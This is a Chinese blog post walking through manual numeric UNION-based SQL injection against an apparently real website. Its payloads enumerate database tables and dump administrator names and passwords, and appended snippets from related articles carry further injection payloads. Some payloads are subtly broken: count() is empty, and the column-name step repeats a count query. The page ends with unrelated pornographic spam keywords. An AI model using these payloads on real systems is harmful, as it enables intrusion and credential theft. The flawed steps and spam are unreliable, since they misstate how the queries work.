<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    記手工SQL數字回顯型注入

    VSole2021-08-17 16:54:46

    前言

    已經檢測出該網站有sql注入問題,試著手工注入網站,順便再復習一下。

    正文

    1.先通過引號 判斷該網站為數字型,payload直接拼接,無需引號閉合,當網站后直接構造拼接 and 0# 網站文章列表內容受到影響顯示空白,此為回顯類型注入

    payload:and 0#
    

    2.進行字段數的猜解,確定回顯位

    字段數猜解通過payload:ORDER BY X # 對X字段進行回顯字段值猜解,此網站X=6時,網站顯示正常則確定回顯字段數為6

    構造payload:UNION SELECT 1,2,3,4,5,6# 確定回顯位為2,6選擇其一即可

    確定回顯位:payload:UNION SELECT 1,2,3,4,5,6#
    

    3.進網站進行信息收集payload:UNION SELECT 1,database(),3,4,5,6# 對第二位字段進行函數替換可收集網站數據庫相關信息如:version() 數據庫版本信息 @@basedirmysql安裝路徑等

    4.獲取表數量,通過上一步得到mysql數據庫版本大于5.1,可以通過MySQL的information_schema數據庫進行數據獲取

    payload:UNION SELECT 1,count(),3,4,5,6 FROM information_schema.tables WHERE table_schema=database() #
    

    5.獲取表名

    payload:UNION SELECT 1,GROUP_CONCAT(table_name),3,4,5,6 FROM information_schema.tables WHERE table_schema=database() #
    

    6.獲取數據庫表字段數

    payload:UNION SELECT 1,count(),3,4,5,6 FROM information_schema.columns WHERE table_schema=database() and table_name='administrators' #
    

    7.獲取數據庫表字段名

    payload:UNION SELECT 1,count(*),3,4,5,6 FROM information_schema.columns WHERE table_schema=database() and table_name='administrators' #
    

    8.獲取表數據

    payload:UNION SELECT 1,group_concat(concat(id,name,password)),3,4,5,6 FROM administrators LIMIT 0,1 #
    

    說明

    以mysql數據庫,數字回顯類型進行sql手工注入流程,僅供參考

    sql注入select
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    SQL注入速查表
    2022-07-29 09:22:37
    現在僅支持MySQL、Microsoft SQL Server,以及一部分ORACLE和PostgreSQL。大部分樣例都不能保證每一個場景都適用。現實場景由于各種插入語、不同的代碼環境以及各種不常見甚至奇特的SQL語句,而經常發生變化。
    id=3';對應的sqlselect * from table where id=3' 這時sql語句出錯,程序無法正常從數據庫中查詢出數據,就會拋出異常; 加and 1=1 ,URL:xxx.xxx.xxx/xxx.php?id=1' order by 3# 沒有報錯,說明存在3列爆出數據庫:?id=-1' union select 1,group_concat,3 from information_schema.schemata#爆出數據表:?id=1' and extractvalue--+(爆字段)?
    id=1' order by 3# 沒有報錯,說明存在3列。id=-1' union select 1,group_concat,3 from 數據庫名.數據表名--+拓展一些其他函數:system_user() 系統用戶名。updatexml函數:細節問題:extractvalue()基本一樣,改個關鍵字updatexml即可,與extractvalue有個很大的區別實在末尾注入加上,如:,而extractvalue函數末尾不加1(數值)?
    sql注入原理:業務端代碼從客戶端接收到惡意payload之后沒有進行過濾直接進行sql語句拼接并且執行造成sql注入本人正在拜讀一本代碼審計的書感覺非常的棒,剛剛好室友在挑戰自己,就順便整理一下知識點!看了一下也沒問題,繼續往下走,發現室友mybatis里的sql全部是使用$拼接的!
    在云SQL上獲取shell
    2022-07-18 17:00:27
    云上的關系數據庫服務,它是由 Google 保護、監控和更新的SQL、PostgreSQL 或 MySQL的服務器。托管 MySQL 實例的限制由于Cloud SQL是一項完全托管的服務,因此用戶無權訪問某些功能。在MySQL中,SUPER權限保留用于系統管理相關任務,FILE權限用于讀取/寫入運行 MySQL服務器上的文件。
    代碼審計,說白了就是白盒測試,審查代碼檢查是否有安全問題,核心就兩點:跟蹤用戶輸入數據+敏感函數參數回溯。
    未正確驗證用戶輸入的應用程序使它們容易受到 SQL 注入的攻擊。SQL 注入攻擊 發生在攻擊者能夠通過操縱用戶輸入數據將一系列惡意 SQL 語句插入“查詢”以供后端數據庫執行時。使用這種類型的威脅,應用程序可以很容易地被黑客入侵并被攻擊者竊取機密數據。
    我見過的流量分析類型的題目總結: 一,ping 報文信息? 二,上傳/下載文件 三,sql注入攻擊 四,訪問特定的加密解密網站 五,后臺掃描+弱密碼爆破+菜刀 六,usb流量分析 七,WiFi無線密碼破解 八,根據一組流量包了解黑客的具體行為例題:一,ping 報文信息?如果是菜刀下載文件的流量,需要刪除分組字節流前開頭和結尾的X@Y字符,否則下載的文件會出錯。
    SQL手工注入總結
    2021-11-11 08:19:35
    雖說目前互聯網上已經有很多關于 sql 注入的神器了,但是在這個 WAF 橫行的時代,手工注入往往在一些真實環境中會顯得尤為重要。本文主要把以前學過的知識做個總結,不會有詳細的知識解讀,類似于查詢手冊的形式,便于以后的復習與查閱,文中內容可能會存在錯誤,望師傅們斧正!
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类